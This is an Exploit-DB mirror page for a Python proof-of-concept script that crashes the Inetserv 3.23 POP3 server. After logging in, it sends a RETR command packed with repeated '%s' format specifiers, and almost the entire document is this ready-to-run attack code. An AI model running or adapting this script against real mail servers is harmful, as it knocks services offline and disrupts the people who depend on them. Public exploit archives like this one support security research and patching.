exploit-db-mirror/exploits/windows/dos/16038.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
484 B
Python
Executable file

#!/usr/bin/python
# Exploit Title: Inetserv 3.23 POP3 DoS
# Date: 1/24/2011
# Author: dmnt (thx G13 for base)
# Software Link: http://www.avtronics.net/inetserv.php
# Version: 3.23
# DoS in RETR and DELE
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "RETR " + "%s" * 40 + "\r\n" # or DELE
s.connect(('127.0.0.1',110))
data=s.recv(1024)
s.send("USER admin\r\n")
data=s.recv(1024)
s.send("PASS 123456\r\n")
data=s.recv(1024)
s.send(buffer)
s.close()